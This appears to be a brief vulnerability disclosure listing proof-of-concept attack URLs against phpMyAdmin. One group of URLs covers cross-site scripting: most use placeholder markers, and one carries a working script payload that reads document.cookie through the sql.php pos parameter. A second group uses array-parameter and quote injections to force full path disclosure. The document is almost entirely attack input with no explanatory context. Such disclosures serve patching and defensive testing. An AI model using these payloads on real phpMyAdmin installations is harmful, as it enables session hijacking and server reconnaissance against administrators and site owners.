Cross-site scripting:
http://www.example.com/phpmyadmin/db_create.php?token=your_token&reload=1&db=[double 
xss(2 followed xss)]
http://www.example.com/phpmyadmin/db_operations.php?db_collation=latin1_swedish_ci&db_copy=true&db=prout&token=your_token&newname=[xss]
http://www.example.com/phpmyadmin/querywindow.php
token=your_token&db=&table=&query_history_latest=[xss]&query_history_latest_db=[xss]&querydisplay_tab=[xss]
http://www.example.com/phpmyadmin/sql.php?db=information_schema&token=your_token&goto=db_details_structure.php&table=CHARACTER_SETS&pos=</textarea>'"><script>alert(document.cookie)</script>

Full path disclosure :
http://www.example.com/scripts/check_lang.php
http://www.example.com/themes/darkblue_orange/layout.inc.php
http://www.example.com/index.php?lang[]=
http://www.example.com/index.php?target[]=
http://www.example.com/index.php?db[]=
http://www.example.com/index.php?goto[]=
http://www.example.com/left.php?server[]=
http://www.example.com/index.php?table[]=
http://www.example.com/server_databases.php?token=your_token&sort_by="
http://www.example.com/index.php?db=information_schema&token=your_token&tbl_group[]=
http://www.example.com/db_printview.php?db="
http://www.example.com/sql.php?back[]=